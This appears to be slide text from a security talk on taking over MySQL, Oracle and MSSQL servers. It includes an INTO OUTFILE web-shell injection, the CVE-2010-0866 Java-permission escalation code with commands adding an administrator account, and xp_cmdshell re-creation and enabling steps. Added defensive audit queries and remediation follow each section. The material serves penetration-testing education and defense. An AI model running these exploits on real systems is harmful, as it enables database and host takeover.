Rock'n Roll in Database Security
Prathan Phongthiproek (Lucifer@CITEC)
Senior Information Security Consultant
ACIS Professional Center
Who am I?
CITEC Evolution
Code name "Lucifer", moderator, speaker
Instructor: Web Application (In)Security 101
Instructor: Mastering in Exploitation
ACIS Professional Center
Red Team: penetration tester
Instructor / speaker
Security consultant / researcher
Founder of CWH Underground Hacker
Exploits, vulnerabilities, papers disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc.
http://www.exploit-db.com/author/?a=1275
Let’s Talk !?
“Get DBA privilege is good but get SHELL is better !!”
MySQL PWNED !! From Web Application to get SHELL
Oracle Escalating Privilege XPL to get SHELL
MSSQL Credentials Attack to get SHELL
MSSQL and Oracle Vulnerabilities
[Bar chart: vulnerabilities per year, 2002–2009; y-axis 0–160; series: SQL Server, Oracle. The individual bar values did not survive extraction.]
MySQL Jump into OS
MySQL 5.x vulnerability, 0-day on Immunity CANVAS
SQL Injection via Web Application (Top Hit !!)
MySQL OUTFILE function
Needs a writable directory
Needs the absolute path
Needs magic_quotes off
UNION SELECT 1,'code',3,4 INTO OUTFILE '/www/htdocs/shell.php'
MySQL LOAD_FILE function (Better !!)
Needs the absolute path
Needs the phpMyAdmin path, or MySQL port 3306 open through the firewall
UNION SELECT 1,load_file(0x4332…………)
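Added defensive check, not part of the talk: these MySQL statements show whether a server is exposed to the INTO OUTFILE and LOAD_FILE() paths described above and strip the FILE privilege from the web application's account, which is the privilege both techniques rely on. The account 'webapp'@'localhost' and the schema appdb are assumed placeholders.

```sql
-- Added example (not from the talk). 'webapp'@'localhost' and appdb are
-- assumed placeholders for the web application's account and schema.

-- 1. Where may the server read or write files?
--    empty value  = anywhere the mysqld process can reach (the dangerous setting)
--    a directory  = only inside that directory
--    NULL         = file import/export disabled entirely
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Which accounts hold the global FILE privilege that INTO OUTFILE and
--    LOAD_FILE() require? The web application's account must not be listed.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 3. Reduce the web application account to table-level rights on its own
--    schema; this removes FILE along with every other global privilege.
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'webapp'@'localhost';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'webapp'@'localhost';
FLUSH PRIVILEGES;
```

In my.cnf, point secure_file_priv at a dedicated directory (for example /var/lib/mysql-files) so that even an account that does hold FILE cannot write into the web root. Relying on magic_quotes is not a defense: LOAD_FILE(0x...) takes a hex literal that contains no quote to escape, so the web-side fix is parameterized queries rather than input escaping.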
Oracle Escalating Privilege XPL to get SHELL – PL/SQL Injection
Dbms_cdc_publish3 – for Oracle 10gR1–11gR2
Dbms_cdc_publish2
Dbms_cdc_publish
Dbms_metadata_open
Dbms_export_extension
Lt_findricset_cursor
Lt_compressworkspace
Lt_mergeworkspace
Lt_removeworkspace
Lt_rollbackworkspace
Oracle Escalating Privilege XPL to get SHELL
The DBMS_JVM_EXP_PERMS package lets any user with just the CREATE SESSION privilege grant themselves Java IO privileges
CVE-2010-0866
Affects Oracle 10g–11g (Windows only)
Defense:
Apply the October 2010 Critical Patch Update
Oracle 11gR2 on Windows is still secure
Revoke the privilege to execute DBMS_JVM_EXP_PERMS from users
Oracle Escalating Privilege XPL to get SHELL
XPL Code (Grant JAVA IO Privilege)
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;

DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'writeFileDescriptor', NULL, 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;

DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission', 'readFileDescriptor', NULL, 'ENABLED' FROM DUAL;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
Oracle Escalating Privilege XPL to get SHELL
XPL Code (OS Execute)
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', 'net user prathan 1234 /add') from dual;
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', 'net localgroup administrators prathan /add') from dual;
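Added defensive check, not part of the talk: run as a DBA, these queries show who is allowed to execute DBMS_JVM_EXP_PERMS and DBMS_JAVA_TEST, and whether the Java permissions that the grant code above creates (FilePermission on <<ALL FILES>>, RuntimePermission read/writeFileDescriptor) are already present in DBA_JAVA_POLICY for an ordinary schema. The SEQ value 12345 is a placeholder to be replaced by the value the second query returns.

```sql
-- Added example (not from the talk). Run as SYS or another DBA.

-- 1. Who can execute the packages the escalation chain uses? Before the fix
--    PUBLIC shows up here, which is what lets any CREATE SESSION user in.
SELECT grantee, privilege, table_name
  FROM dba_tab_privs
 WHERE table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA_TEST')
 ORDER BY table_name, grantee;

-- 2. Which Java permissions are granted to non-system grantees? A normal
--    schema holding java.io.FilePermission on <<ALL FILES>> or
--    java.lang.RuntimePermission read/writeFileDescriptor is the footprint
--    of the IMPORT_JVM_PERMS grant shown earlier.
SELECT seq, kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name IN ('java.io.FilePermission', 'java.lang.RuntimePermission')
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV', 'JAVADEBUGPRIV', 'JAVA_ADMIN')
 ORDER BY grantee, seq;

-- 3. Remove a rogue policy entry by its SEQ (12345 is a placeholder taken from
--    query 2) and take EXECUTE on the package away from PUBLIC, as the
--    defense slide recommends.
EXEC DBMS_JAVA.DELETE_PERMISSION(12345);
REVOKE EXECUTE ON sys.dbms_jvm_exp_perms FROM PUBLIC;
```

Query 2 doubles as a detection rule: schedule it and alert on any new row whose grantee is an application schema, since legitimate applications almost never need <<ALL FILES>> or file-descriptor permissions inside the database JVM.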
MSSQL Credentials Attack to get SHELL
'sa' is the God account and runs with SYSTEM privilege on Windows
The default 'sa' password is blank or guessable
Requires the xp_cmdshell extended stored procedure (disabled by default on MSSQL 2005+)
Enable it with osql on MSSQL 2005:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
MSSQL Credentials Attack to get SHELL
On MSSQL 2000, when xp_cmdshell has been dropped with sp_dropextendedproc:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll'
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
MSSQL Credentials Attack to get SHELL
Brute-force the 'sa' password, then use the sa credentials to run OS commands on the target machine with Metasploit modules:
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
admin/mssql/mssql_exec
windows/smb/psexec
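Added defensive check, not part of the talk: SQL Server 2005+ queries that cover the three preconditions of the credentials attack above (a blank or guessable sa password, xp_cmdshell or OLE Automation enabled, and extended procedures re-registered with sp_addextendedproc) together with the remediation. The password value is a placeholder.

```sql
-- Added example (not from the talk). Run as a sysadmin on SQL Server 2005+.

-- 1. Is the sa login enabled, and does it still carry an empty password?
--    has_blank_password = 1 means anyone who can reach port 1433 is sysadmin.
SELECT name, is_disabled,
       PWDCOMPARE('', password_hash) AS has_blank_password
  FROM sys.sql_logins
 WHERE name = 'sa';

-- 2. Are the two shell-out features switched on? value_in_use = 1 means
--    a sysadmin login can run OS commands directly (xp_cmdshell) or via
--    sp_OACreate('WScript.Shell') as in the 2000 procedure above.
SELECT name, value_in_use
  FROM sys.configurations
 WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 3. Has someone registered their own extended procedure? This view lists
--    user-registered entries only, so on a clean server it is normally empty;
--    any row here was added with sp_addextendedproc and deserves a look.
SELECT name, dll_name
  FROM sys.extended_procedures
 ORDER BY dll_name, name;

-- 4. Remediate: turn both features off, give sa a strong password (placeholder
--    below) and disable the login so brute force has nothing to hit.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
ALTER LOGIN sa WITH PASSWORD = '<strong-random-password-placeholder>';
ALTER LOGIN sa DISABLE;
```

Pair the configuration check with monitoring: a change to 'xp_cmdshell' or 'Ole Automation Procedures' in sys.configurations, or a new row in sys.extended_procedures, is a high-signal event, because the attack path above cannot proceed without one of them. The mssql_ping and mssql_login modules also generate failed-login events (SQL Server error 18456) in bursts, which is the brute-force stage to alert on.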
IPWN4 – PenTest Tools (Jail-Broken)
Pen-test tools (command line):
Metasploit Framework
Social Engineering Toolkit
Nmap scanner, Amap, Hping
Nbtscan, netcat
Nikto2, dnsmap
Ettercap-NG, Aircrack-NG
GUI tools:
iTeleport
Jaadu RDP
iNet
WiFiFoFum
Full compromise of MSSQL via iPhone 4